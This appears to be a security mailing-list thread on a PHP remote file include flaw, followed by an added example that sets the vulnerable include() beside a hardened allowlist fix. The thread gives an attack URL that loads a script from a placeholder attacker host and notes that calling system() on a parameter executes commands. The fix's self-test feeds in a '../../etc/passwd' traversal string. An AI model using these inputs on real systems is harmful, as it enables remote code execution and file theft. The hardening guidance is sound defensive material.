Josh Zlatin wrote:
> Looks to me like a clarification, meaning:
> http://[target]/index.php?page=http://[attacker]/evilscript opens and runs the php script (note the following code in index.php
> though: include($_GET["page"].".php");
Yes, it does appear to be a remote file include flaw. From index.php,
you have:
if ($_GET["page"]=='')
    ...
else
{
    // the page parameter reaches include() without any validation
    include($_GET["page"].".php");
}
> I was unable to run uname -a or any other command I tried via the cmd
> command, but that is probably because the 'cmd' variable is defined as
> the result of the following SQL query:
Actually, it is just passed to whatever URL you pass in via the page
parameter. So all you'd need to run code is a PHP script that calls
system() with the value of cmd.
George
--
theall at tenablesecurity.com
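The fix for the include() pattern discussed in this thread is to stop user input from reaching the include path at all. The following is an added example, not code from the thread or from the affected application: it places the vulnerable fragment beside a hardened version that resolves the page parameter through a fixed allowlist, and adds a runtime check of allow_url_include (the php.ini setting that governs include() of URLs since PHP 5.2; before that, allow_url_fopen did). The page names, file paths and allowlist entries are constructed for illustration.

```php
<?php
// Added example (not from the original thread). Page names, paths and the
// allowlist below are constructed for illustration.

// --- Vulnerable form: equivalent to the index.php fragment in the thread ---
// The request parameter flows straight into include(). With allow_url_include
// on, a URL is fetched and executed; with it off, local files are still
// reachable through path traversal, so the pattern is unsafe either way.
function render_page_vulnerable(string $page): void
{
    include($page . ".php");
}

// --- Hardened form: exact-match allowlist, user input never becomes a path ---
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function resolve_page(string $requested): ?string
{
    // Anything not literally in the map (URLs, "../", stream wrappers such as
    // php://, null bytes) resolves to null and is never included.
    return PAGES[$requested] ?? null;
}

function render_page_hardened(string $requested): void
{
    $path = resolve_page($requested);
    if ($path === null) {
        http_response_code(404);
        echo "Unknown page";
        return;
    }
    // Path is built only from the constant map, anchored at this directory.
    include __DIR__ . '/' . $path;
}

// Defence in depth: detect whether the runtime permits remote includes at all.
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (PHP_SAPI === 'cli') {
    // Self-check of the allowlist behaviour from the command line.
    var_dump(resolve_page('home'));
    var_dump(resolve_page('http://example.com/x'));
    var_dump(resolve_page('../../etc/passwd'));
    echo remote_include_enabled()
        ? "allow_url_include is On; remote includes are possible\n"
        : "allow_url_include is Off\n";
}
```

In a web context the entry point would call render_page_hardened($_GET['page'] ?? 'home'); the allowlist lookup is what matters, since any scheme that builds a path from the parameter (prefixing a directory, stripping characters) tends to leave a bypass. Disabling allow_url_include in php.ini closes the remote variant but not the local one, so it complements the allowlist rather than replacing it.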